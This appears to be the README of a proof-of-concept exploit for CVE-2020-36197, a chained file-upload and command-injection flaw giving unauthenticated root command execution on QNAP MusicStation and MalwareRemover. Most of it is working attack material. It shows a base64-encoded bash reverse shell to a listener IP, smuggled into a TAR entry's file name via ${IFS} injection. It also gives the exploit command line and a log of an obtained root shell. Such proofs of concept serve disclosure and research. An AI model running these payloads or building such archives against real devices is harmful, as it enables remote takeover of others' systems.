CVE-2020-36197

Introduction

The official QNAP MusicStation and MalwareRemover apps are affected by an arbitrary file upload vulnerability and a command injection vulnerability which, chained together, give pre-auth remote command execution as root.

Read more at https://www.shielder.it/advisories/qnap-musicstation-malwareremover-pre-auth-remote-code-execution/

Usage

  1. Create a new TAR file with the payload, e.g.:

```shell
$ git clone https://github.com/ptoomey3/evilarc
Cloning into 'evilarc'...
remote: Enumerating objects: 12, done.
remote: Total 12 (delta 0), reused 0 (delta 0), pack-reused 12
Unpacking objects: 100% (12/12), done.
$ cd evilarc/
$ echo -n 'bash -i >& /dev/tcp/172.16.42.114/8383 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==
$ touch ';echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#'
$ ./evilarc.py -f a.tar -o unix -d0 -p "/tmp/polict" ';echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#'
Creating a.tar containing /tmp/polict/;echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#
```

  2. Run the exploit with the correct arguments, e.g.:

```shell
python3 ./CVE-2020-36197.py -rh http://172.16.42.178:8080 -lh 172.16.42.114 -sh 19 -sm 16 -tf a.tar
```

Example run

```shell
$ ./$0.py -rh http://172.16.42.178:8080 -lh 172.16.42.114 -sh 19 -sm 16 -tf a.tar
2020-10-26 19:14:18,761 - INFO - sleeping for 41.23835 seconds to wait for 19:16:00 minus 1 minute...
2020-10-26 19:15:00,001 - INFO - starting remote shell handler...
2020-10-26 19:15:00,004 - INFO - continously uploading jpg with payload in background...
bash: no job control in this shell
bash-3.2# id
id
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
bash-3.2# exit
exit
exit
*** Connection closed by remote host ***
```

Credits

  • polict of Shielder for vulnerabilities discovery and exploit development.